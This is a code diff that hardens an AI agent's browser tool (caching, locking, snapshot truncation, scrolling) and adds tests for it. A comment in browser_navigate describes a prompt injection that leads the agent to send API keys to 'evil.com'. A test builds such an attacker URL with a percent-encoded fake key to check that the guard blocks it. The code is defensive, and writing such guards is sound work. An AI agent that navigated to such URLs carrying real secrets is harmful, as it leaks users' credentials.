diff --git a/tests/tools/test_browser_hardening.py b/tests/tools/test_browser_hardening.py new file mode 100644 index 0000000000..374f7af614 --- /dev/null +++ b/tests/tools/test_browser_hardening.py @@ -0,0 +1,271 @@ +"""Tests for browser_tool.py hardening: caching, security, thread safety, truncation.""" + +import inspect +import os +from unittest.mock import MagicMock, patch + +import pytest + + +# --------------------------------------------------------------------------- +# Helpers +# --------------------------------------------------------------------------- + +def _reset_caches(): + """Reset all module-level caches so tests start clean.""" + import tools.browser_tool as bt + bt._cached_agent_browser = None + bt._agent_browser_resolved = False + bt._cached_command_timeout = None + bt._command_timeout_resolved = False + # lru_cache for _discover_homebrew_node_dirs + if hasattr(bt._discover_homebrew_node_dirs, "cache_clear"): + bt._discover_homebrew_node_dirs.cache_clear() + + +@pytest.fixture(autouse=True) +def _clean_caches(): + _reset_caches() + yield + _reset_caches() + + +# --------------------------------------------------------------------------- +# Dead code removal +# --------------------------------------------------------------------------- + +class TestDeadCodeRemoval: + """Verify dead code was actually removed.""" + + def test_no_default_session_timeout(self): + import tools.browser_tool as bt + assert not hasattr(bt, "DEFAULT_SESSION_TIMEOUT") + + def test_browser_close_schema_removed(self): + from tools.browser_tool import BROWSER_TOOL_SCHEMAS + names = [s["name"] for s in BROWSER_TOOL_SCHEMAS] + assert "browser_close" not in names + + +# --------------------------------------------------------------------------- +# Caching: _find_agent_browser +# --------------------------------------------------------------------------- + +class TestFindAgentBrowserCache: + + def test_cached_after_first_call(self): + import tools.browser_tool as bt + with patch("shutil.which", return_value="/usr/bin/agent-browser"): + result1 = bt._find_agent_browser() + result2 = bt._find_agent_browser() + assert result1 == result2 == "/usr/bin/agent-browser" + assert bt._agent_browser_resolved is True + + def test_cache_cleared_by_cleanup(self): + import tools.browser_tool as bt + bt._cached_agent_browser = "/fake/path" + bt._agent_browser_resolved = True + bt.cleanup_all_browsers() + assert bt._agent_browser_resolved is False + + def test_not_found_cached_raises_on_subsequent(self): + """After FileNotFoundError, subsequent calls should raise from cache.""" + import tools.browser_tool as bt + from pathlib import Path + + original_exists = Path.exists + + def mock_exists(self): + if "node_modules" in str(self) and "agent-browser" in str(self): + return False + return original_exists(self) + + with patch("shutil.which", return_value=None), \ + patch("os.path.isdir", return_value=False), \ + patch.object(Path, "exists", mock_exists): + with pytest.raises(FileNotFoundError): + bt._find_agent_browser() + # Second call should also raise (from cache) + with pytest.raises(FileNotFoundError, match="cached"): + bt._find_agent_browser() + + +# --------------------------------------------------------------------------- +# Caching: _get_command_timeout +# --------------------------------------------------------------------------- + +class TestCommandTimeoutCache: + + def test_default_is_30(self): + from tools.browser_tool import _get_command_timeout + with patch("hermes_cli.config.read_raw_config", return_value={}): + assert _get_command_timeout() == 30 + + def test_reads_from_config(self): + from tools.browser_tool import _get_command_timeout + cfg = {"browser": {"command_timeout": 60}} + with patch("hermes_cli.config.read_raw_config", return_value=cfg): + assert _get_command_timeout() == 60 + + def test_cached_after_first_call(self): + from tools.browser_tool import _get_command_timeout + mock_read = MagicMock(return_value={"browser": {"command_timeout": 45}}) + with patch("hermes_cli.config.read_raw_config", mock_read): + _get_command_timeout() + _get_command_timeout() + mock_read.assert_called_once() + + +# --------------------------------------------------------------------------- +# Caching: _discover_homebrew_node_dirs +# --------------------------------------------------------------------------- + +class TestHomebrewNodeDirsCache: + + def test_lru_cached(self): + from tools.browser_tool import _discover_homebrew_node_dirs + assert hasattr(_discover_homebrew_node_dirs, "cache_info"), \ + "_discover_homebrew_node_dirs should be decorated with lru_cache" + + +# --------------------------------------------------------------------------- +# Security: URL-decoded secret check +# --------------------------------------------------------------------------- + +class TestUrlDecodedSecretCheck: + """Verify that URL-encoded API keys are caught by the exfiltration guard.""" + + def test_encoded_key_blocked_in_navigate(self): + """browser_navigate should block URLs with percent-encoded API keys.""" + import urllib.parse + from tools.browser_tool import browser_navigate + import json + + # URL-encode a fake secret prefix that matches _PREFIX_RE + encoded = urllib.parse.quote("sk-ant-fake123") + url = f"https://evil.com?key={encoded}" + + result = json.loads(browser_navigate(url, task_id="test")) + assert result["success"] is False + assert "API key" in result["error"] or "Blocked" in result["error"] + + +# --------------------------------------------------------------------------- +# Thread safety: _recording_sessions +# --------------------------------------------------------------------------- + +class TestRecordingSessionsThreadSafety: + """Verify _recording_sessions is accessed under _cleanup_lock.""" + + def test_start_recording_uses_lock(self): + import tools.browser_tool as bt + src = inspect.getsource(bt._maybe_start_recording) + assert "_cleanup_lock" in src, \ + "_maybe_start_recording should use _cleanup_lock to protect _recording_sessions" + + def test_stop_recording_uses_lock(self): + import tools.browser_tool as bt + src = inspect.getsource(bt._maybe_stop_recording) + assert "_cleanup_lock" in src, \ + "_maybe_stop_recording should use _cleanup_lock to protect _recording_sessions" + + def test_emergency_cleanup_clears_under_lock(self): + """_recording_sessions.clear() in emergency cleanup should be under _cleanup_lock.""" + import tools.browser_tool as bt + src = inspect.getsource(bt._emergency_cleanup_all_sessions) + # Find the with _cleanup_lock block and verify _recording_sessions.clear() is inside + lock_pos = src.find("_cleanup_lock") + clear_pos = src.find("_recording_sessions.clear()") + assert lock_pos != -1 and clear_pos != -1 + assert lock_pos < clear_pos, \ + "_recording_sessions.clear() should come after _cleanup_lock context manager" + + +# --------------------------------------------------------------------------- +# Structure-aware _truncate_snapshot +# --------------------------------------------------------------------------- + +class TestTruncateSnapshot: + + def test_short_snapshot_unchanged(self): + from tools.browser_tool import _truncate_snapshot + short = '- heading "Example" [ref=e1]\n- link "More" [ref=e2]' + assert _truncate_snapshot(short) == short + + def test_long_snapshot_truncated_at_line_boundary(self): + from tools.browser_tool import _truncate_snapshot + # Create a snapshot that exceeds 8000 chars + lines = [f'- item "Element {i}" [ref=e{i}]' for i in range(500)] + snapshot = "\n".join(lines) + assert len(snapshot) > 8000 + + result = _truncate_snapshot(snapshot, max_chars=200) + assert len(result) <= 300 # some margin for the truncation note + assert "truncated" in result.lower() + # Every line in the result should be complete (not cut mid-element) + for line in result.split("\n"): + if line.strip() and "truncated" not in line.lower(): + assert line.startswith("- item") or line == "" + + def test_truncation_reports_remaining_count(self): + from tools.browser_tool import _truncate_snapshot + lines = [f"- line {i}" for i in range(100)] + snapshot = "\n".join(lines) + result = _truncate_snapshot(snapshot, max_chars=200) + # Should mention how many lines were truncated + assert "more line" in result.lower() + + +# --------------------------------------------------------------------------- +# Scroll optimization +# --------------------------------------------------------------------------- + +class TestScrollOptimization: + + def test_agent_browser_path_uses_pixel_scroll(self): + """Verify agent-browser path uses single pixel-based scroll, not 5x loop.""" + import tools.browser_tool as bt + src = inspect.getsource(bt.browser_scroll) + assert "_SCROLL_PIXELS" in src, \ + "browser_scroll should use _SCROLL_PIXELS for agent-browser path" + + +# --------------------------------------------------------------------------- +# Empty stdout = failure +# --------------------------------------------------------------------------- + +class TestEmptyStdoutFailure: + + def test_empty_stdout_returns_failure(self): + """Verify _run_browser_command returns failure on empty stdout.""" + import tools.browser_tool as bt + src = inspect.getsource(bt._run_browser_command) + assert "returned no output" in src, \ + "_run_browser_command should treat empty stdout as failure" + + def test_empty_ok_commands_is_module_level_frozenset(self): + """_EMPTY_OK_COMMANDS should be a module-level frozenset, not defined inside a function.""" + import tools.browser_tool as bt + assert hasattr(bt, "_EMPTY_OK_COMMANDS") + assert isinstance(bt._EMPTY_OK_COMMANDS, frozenset) + assert "close" in bt._EMPTY_OK_COMMANDS + assert "record" in bt._EMPTY_OK_COMMANDS + + +# --------------------------------------------------------------------------- +# _camofox_eval bug fix +# --------------------------------------------------------------------------- + +class TestCamofoxEvalFix: + + def test_uses_correct_ensure_tab_signature(self): + """_camofox_eval should pass task_id string to _ensure_tab, not a session dict.""" + import tools.browser_tool as bt + src = inspect.getsource(bt._camofox_eval) + # Should NOT call _get_session at all — _ensure_tab handles it + assert "_get_session" not in src, \ + "_camofox_eval should not call _get_session (removed unused import)" + # Should use body= not json_data= + assert "json_data=" not in src, \ + "_camofox_eval should use body= kwarg for _post, not json_data=" + assert "body=" in src diff --git a/tests/tools/test_browser_homebrew_paths.py b/tests/tools/test_browser_homebrew_paths.py index 6f92e88f98..b54f4abb89 100644 --- a/tests/tools/test_browser_homebrew_paths.py +++ b/tests/tools/test_browser_homebrew_paths.py @@ -15,6 +15,19 @@ from tools.browser_tool import ( _SANE_PATH, check_browser_requirements, ) +import tools.browser_tool as _bt + + +@pytest.fixture(autouse=True) +def _clear_browser_caches(): + """Clear lru_cache and manual caches between tests.""" + _discover_homebrew_node_dirs.cache_clear() + _bt._cached_agent_browser = None + _bt._agent_browser_resolved = False + yield + _discover_homebrew_node_dirs.cache_clear() + _bt._cached_agent_browser = None + _bt._agent_browser_resolved = False class TestSanePath: @@ -38,7 +51,7 @@ class TestDiscoverHomebrewNodeDirs: def test_returns_empty_when_no_homebrew(self): """Non-macOS systems without /opt/homebrew/opt should return empty.""" with patch("os.path.isdir", return_value=False): - assert _discover_homebrew_node_dirs() == [] + assert _discover_homebrew_node_dirs() == () def test_finds_versioned_node_dirs(self): """Should discover node@20/bin, node@24/bin etc.""" @@ -68,13 +81,13 @@ class TestDiscoverHomebrewNodeDirs: with patch("os.path.isdir", return_value=True), \ patch("os.listdir", return_value=["node"]): result = _discover_homebrew_node_dirs() - assert result == [] + assert result == () def test_handles_oserror_gracefully(self): """Should return empty list if listdir raises OSError.""" with patch("os.path.isdir", return_value=True), \ patch("os.listdir", side_effect=OSError("Permission denied")): - assert _discover_homebrew_node_dirs() == [] + assert _discover_homebrew_node_dirs() == () class TestFindAgentBrowser: diff --git a/tools/browser_tool.py b/tools/browser_tool.py index 9ad8ba48b7..a3b4083816 100644 --- a/tools/browser_tool.py +++ b/tools/browser_tool.py @@ -50,6 +50,7 @@ Usage: """ import atexit +import functools import json import logging import os @@ -100,27 +101,27 @@ _SANE_PATH = ( ) -def _discover_homebrew_node_dirs() -> list[str]: +@functools.lru_cache(maxsize=1) +def _discover_homebrew_node_dirs() -> tuple[str, ...]: """Find Homebrew versioned Node.js bin directories (e.g. node@20, node@24). When Node is installed via ``brew install node@24`` and NOT linked into - /opt/homebrew/bin, the binary lives only in /opt/homebrew/opt/node@24/bin/. - This function discovers those paths so they can be added to subprocess PATH. + /opt/homebrew/bin, agent-browser isn't discoverable on the default PATH. + This function finds those directories so they can be prepended. """ dirs: list[str] = [] homebrew_opt = "/opt/homebrew/opt" if not os.path.isdir(homebrew_opt): - return dirs + return tuple(dirs) try: for entry in os.listdir(homebrew_opt): if entry.startswith("node") and entry != "node": - # e.g. node@20, node@24 bin_dir = os.path.join(homebrew_opt, entry, "bin") if os.path.isdir(bin_dir): dirs.append(bin_dir) except OSError: pass - return dirs + return tuple(dirs) # Throttle screenshot cleanup to avoid repeated full directory scans. _last_screenshot_cleanup_by_dir: dict[str, float] = {} @@ -132,28 +133,39 @@ _last_screenshot_cleanup_by_dir: dict[str, float] = {} # Default timeout for browser commands (seconds) DEFAULT_COMMAND_TIMEOUT = 30 -# Default session timeout (seconds) -DEFAULT_SESSION_TIMEOUT = 300 - # Max tokens for snapshot content before summarization SNAPSHOT_SUMMARIZE_THRESHOLD = 8000 +# Commands that legitimately return empty stdout (e.g. close, record). +_EMPTY_OK_COMMANDS: frozenset = frozenset({"close", "record"}) + +_cached_command_timeout: Optional[int] = None +_command_timeout_resolved = False + def _get_command_timeout() -> int: """Return the configured browser command timeout from config.yaml. Reads ``config["browser"]["command_timeout"]`` and falls back to - ``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. + ``DEFAULT_COMMAND_TIMEOUT`` (30s) if unset or unreadable. Result is + cached after the first call and cleared by ``cleanup_all_browsers()``. """ + global _cached_command_timeout, _command_timeout_resolved + if _command_timeout_resolved: + return _cached_command_timeout # type: ignore[return-value] + + _command_timeout_resolved = True + result = DEFAULT_COMMAND_TIMEOUT try: from hermes_cli.config import read_raw_config cfg = read_raw_config() val = cfg.get("browser", {}).get("command_timeout") if val is not None: - return max(int(val), 5) # Floor at 5s to avoid instant kills + result = max(int(val), 5) # Floor at 5s to avoid instant kills except Exception as e: logger.debug("Could not read command_timeout from config: %s", e) - return DEFAULT_COMMAND_TIMEOUT + _cached_command_timeout = result + return result def _get_vision_model() -> Optional[str]: @@ -239,6 +251,8 @@ _cached_cloud_provider: Optional[CloudBrowserProvider] = None _cloud_provider_resolved = False _allow_private_urls_resolved = False _cached_allow_private_urls: Optional[bool] = None +_cached_agent_browser: Optional[str] = None +_agent_browser_resolved = False def _get_cloud_provider() -> Optional[CloudBrowserProvider]: @@ -415,7 +429,7 @@ def _emergency_cleanup_all_sessions(): with _cleanup_lock: _active_sessions.clear() _session_last_activity.clear() - _recording_sessions.clear() + _recording_sessions.clear() # Register cleanup via atexit only. Previous versions installed SIGINT/SIGTERM @@ -617,15 +631,6 @@ BROWSER_TOOL_SCHEMAS = [ "required": ["key"] } }, - { - "name": "browser_close", - "description": "Close the browser session and release resources. Call this when done with browser tasks to free up cloud browser session quota.", - "parameters": { - "type": "object", - "properties": {}, - "required": [] - } - }, { "name": "browser_get_images", "description": "Get a list of all images on the current page with their URLs and alt text. Useful for finding images to analyze with the vision tool. Requires browser_navigate to be called first.", @@ -777,10 +782,26 @@ def _find_agent_browser() -> str: Raises: FileNotFoundError: If agent-browser is not installed """ + global _cached_agent_browser, _agent_browser_resolved + if _agent_browser_resolved: + if _cached_agent_browser is None: + raise FileNotFoundError( + "agent-browser CLI not found (cached). Install it with: " + f"{_browser_install_hint()}\n" + "Or run 'npm install' in the repo root to install locally.\n" + "Or ensure npx is available in your PATH." + ) + return _cached_agent_browser + + # Note: _agent_browser_resolved is set at each return site below + # (not before the search) to prevent a race where a concurrent thread + # sees resolved=True but _cached_agent_browser is still None. # Check if it's in PATH (global install) which_result = shutil.which("agent-browser") if which_result: + _cached_agent_browser = which_result + _agent_browser_resolved = True return which_result # Build an extended search PATH including Homebrew and Hermes-managed dirs. @@ -800,21 +821,29 @@ def _find_agent_browser() -> str: extended_path = os.pathsep.join(extra_dirs) which_result = shutil.which("agent-browser", path=extended_path) if which_result: + _cached_agent_browser = which_result + _agent_browser_resolved = True return which_result # Check local node_modules/.bin/ (npm install in repo root) repo_root = Path(__file__).parent.parent local_bin = repo_root / "node_modules" / ".bin" / "agent-browser" if local_bin.exists(): - return str(local_bin) + _cached_agent_browser = str(local_bin) + _agent_browser_resolved = True + return _cached_agent_browser # Check common npx locations (also search extended dirs) npx_path = shutil.which("npx") if not npx_path and extra_dirs: npx_path = shutil.which("npx", path=os.pathsep.join(extra_dirs)) if npx_path: - return "npx agent-browser" + _cached_agent_browser = "npx agent-browser" + _agent_browser_resolved = True + return _cached_agent_browser + # Nothing found — cache the failure so subsequent calls don't re-scan. + _agent_browser_resolved = True raise FileNotFoundError( "agent-browser CLI not found. Install it with: " f"{_browser_install_hint()}\n" @@ -935,7 +964,7 @@ def _run_browser_command( path_parts = [p for p in existing_path.split(":") if p] candidate_dirs = ( [hermes_node_bin] - + _discover_homebrew_node_dirs() + + list(_discover_homebrew_node_dirs()) + [p for p in _SANE_PATH.split(":") if p] ) @@ -994,15 +1023,15 @@ def _run_browser_command( level = logging.WARNING if returncode != 0 else logging.DEBUG logger.log(level, "browser '%s' stderr: %s", command, stderr.strip()[:500]) - # Log empty output as warning — common sign of broken agent-browser - if not stdout.strip() and returncode == 0: - logger.warning("browser '%s' returned empty stdout with rc=0. " - "cmd=%s stderr=%s", - command, " ".join(cmd_parts[:4]) + "...", - (stderr or "")[:200]) - stdout_text = stdout.strip() + # Empty output with rc=0 is a broken state — treat as failure rather + # than silently returning {"success": True, "data": {}}. + # Some commands (close, record) legitimately return no output. + if not stdout_text and returncode == 0 and command not in _EMPTY_OK_COMMANDS: + logger.warning("browser '%s' returned empty output (rc=0)", command) + return {"success": False, "error": f"Browser command '{command}' returned no output"} + if stdout_text: try: parsed = json.loads(stdout_text) @@ -1114,20 +1143,34 @@ def _extract_relevant_content( def _truncate_snapshot(snapshot_text: str, max_chars: int = 8000) -> str: - """ - Simple truncation fallback for snapshots. - + """Structure-aware truncation for snapshots. + + Cuts at line boundaries so that accessibility tree elements are never + split mid-line, and appends a note telling the agent how much was + omitted. + Args: snapshot_text: The snapshot text to truncate max_chars: Maximum characters to keep - + Returns: Truncated text with indicator if truncated """ if len(snapshot_text) <= max_chars: return snapshot_text - - return snapshot_text[:max_chars] + "\n\n[... content truncated ...]" + + lines = snapshot_text.split('\n') + result: list[str] = [] + chars = 0 + for line in lines: + if chars + len(line) + 1 > max_chars - 80: # reserve space for note + break + result.append(line) + chars += len(line) + 1 + remaining = len(lines) - len(result) + if remaining > 0: + result.append(f'\n[... {remaining} more lines truncated, use browser_snapshot for full content]') + return '\n'.join(result) # ============================================================================ @@ -1148,8 +1191,11 @@ def browser_navigate(url: str, task_id: Optional[str] = None) -> str: # Secret exfiltration protection — block URLs that embed API keys or # tokens in query parameters. A prompt injection could trick the agent # into navigating to https://evil.com/steal?key=sk-ant-... to exfil secrets. + # Also check URL-decoded form to catch %2D encoding tricks (e.g. sk%2Dant%2D...). + import urllib.parse from agent.redact import _PREFIX_RE - if _PREFIX_RE.search(url): + url_decoded = urllib.parse.unquote(url) + if _PREFIX_RE.search(url) or _PREFIX_RE.search(url_decoded): return json.dumps({ "success": False, "error": "Blocked: URL contains what appears to be an API key or token. " @@ -1415,13 +1461,15 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str: "error": f"Invalid direction '{direction}'. Use 'up' or 'down'." }, ensure_ascii=False) - # Repeat the scroll 5 times to get meaningful page movement. - # Most backends scroll ~100px per call, which is barely visible. - # 5x gives roughly half a viewport of travel, backend-agnostic. - _SCROLL_REPEATS = 5 + # Single scroll with pixel amount instead of 5x subprocess calls. + # agent-browser supports: agent-browser scroll down 500 + # ~500px is roughly half a viewport of travel. + _SCROLL_PIXELS = 500 if _is_camofox_mode(): from tools.browser_camofox import camofox_scroll + # Camofox REST API doesn't support pixel args; use repeated calls + _SCROLL_REPEATS = 5 result = None for _ in range(_SCROLL_REPEATS): result = camofox_scroll(direction, task_id) @@ -1429,14 +1477,12 @@ def browser_scroll(direction: str, task_id: Optional[str] = None) -> str: effective_task_id = task_id or "default" - result = None - for _ in range(_SCROLL_REPEATS): - result = _run_browser_command(effective_task_id, "scroll", [direction]) - if not result.get("success"): - return json.dumps({ - "success": False, - "error": result.get("error", f"Failed to scroll {direction}") - }, ensure_ascii=False) + result = _run_browser_command(effective_task_id, "scroll", [direction, str(_SCROLL_PIXELS)]) + if not result.get("success"): + return json.dumps({ + "success": False, + "error": result.get("error", f"Failed to scroll {direction}") + }, ensure_ascii=False) return json.dumps({ "success": True, @@ -1607,11 +1653,11 @@ def _browser_eval(expression: str, task_id: Optional[str] = None) -> str: def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str: """Evaluate JS via Camofox's /tabs/{tab_id}/eval endpoint (if available).""" - from tools.browser_camofox import _get_session, _ensure_tab, _post + from tools.browser_camofox import _ensure_tab, _post try: - session = _get_session(task_id or "default") - tab_id = _ensure_tab(session) - resp = _post(f"/tabs/{tab_id}/eval", json_data={"expression": expression}) + tab_info = _ensure_tab(task_id or "default") + tab_id = tab_info.get("tab_id") or tab_info.get("id") + resp = _post(f"/tabs/{tab_id}/eval", body={"expression": expression}) # Camofox returns the result in a JSON envelope raw_result = resp.get("result") if isinstance(resp, dict) else resp @@ -1641,8 +1687,9 @@ def _camofox_eval(expression: str, task_id: Optional[str] = None) -> str: def _maybe_start_recording(task_id: str): """Start recording if browser.record_sessions is enabled in config.""" - if task_id in _recording_sessions: - return + with _cleanup_lock: + if task_id in _recording_sessions: + return try: from hermes_cli.config import read_raw_config hermes_home = get_hermes_home() @@ -1662,7 +1709,8 @@ def _maybe_start_recording(task_id: str): result = _run_browser_command(task_id, "record", ["start", str(recording_path)]) if result.get("success"): - _recording_sessions.add(task_id) + with _cleanup_lock: + _recording_sessions.add(task_id) logger.info("Auto-recording browser session %s to %s", task_id, recording_path) else: logger.debug("Could not start auto-recording: %s", result.get("error")) @@ -1672,8 +1720,9 @@ def _maybe_start_recording(task_id: str): def _maybe_stop_recording(task_id: str): """Stop recording if one is active for this session.""" - if task_id not in _recording_sessions: - return + with _cleanup_lock: + if task_id not in _recording_sessions: + return try: result = _run_browser_command(task_id, "record", ["stop"]) if result.get("success"): @@ -1682,7 +1731,8 @@ def _maybe_stop_recording(task_id: str): except Exception as e: logger.debug("Could not stop recording for %s: %s", task_id, e) finally: - _recording_sessions.discard(task_id) + with _cleanup_lock: + _recording_sessions.discard(task_id) def browser_get_images(task_id: Optional[str] = None) -> str: @@ -2041,6 +2091,14 @@ def cleanup_all_browsers() -> None: for task_id in task_ids: cleanup_browser(task_id) + # Reset cached lookups so they are re-evaluated on next use. + global _cached_agent_browser, _agent_browser_resolved + global _cached_command_timeout, _command_timeout_resolved + _cached_agent_browser = None + _agent_browser_resolved = False + _discover_homebrew_node_dirs.cache_clear() + _cached_command_timeout = None + _command_timeout_resolved = False # ============================================================================